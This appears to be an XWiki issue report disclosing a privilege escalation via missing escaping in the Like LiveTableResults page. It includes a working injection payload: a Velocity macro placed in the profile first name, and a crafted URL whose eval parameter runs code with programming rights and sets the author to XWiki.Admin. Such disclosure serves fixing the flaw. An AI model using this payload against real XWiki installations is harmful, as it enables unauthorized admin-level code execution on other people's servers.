XWiki Platform issue XWIKI-20611

Privilege escalation (PR) from account through like LiveTableResults


    Description

      Steps to reproduce:

      1. In the user profile, set your first name to {{cache timeToLive=1}}{{velocity}}#evaluate($request.eval)
      2. Click on the Like-button at the bottom left of your user profile.
      3. Open <xwiki-host>/xwiki/bin/get/XWiki/Like/Code/LiveTableResultPage?outputSyntax=plain&offset=0&limit=10&eval=%23set(%24mydoc%20%3D%20%24doc.getDocument())%20%24mydoc.setContentAuthorReference(%22xwiki%3AXWiki.Admin%22)%20%24mydoc.setTitle(%22Hello%20World%22)%20%24mydoc.getTitle(), where <xwiki-host> is the URL of your XWiki installation.

      Expected result:

      The property

      "doc_title":"Profile of {{cache timeToLive=1}}{{velocity}}#evaluate($request.eval)"

      is in the JSON.

      Actual result:

      The property "doc_title":"Profile of Hello World " is in the result, showing that the Velocity code that is passed in the URL parameter eval has been executed with programming rights.

      This demonstrates a privilege escalation from account to programming rights due to missing escaping in the LiveTable results page. While this document was introduced in 13.4-rc-1, the same code was also in XWiki.Like.UserProfileUIX in earlier versions, so the true "affects version" is probably older.

      People

        mleduc (Manuel Leduc)
        MichaelHamann (Michael Hamann)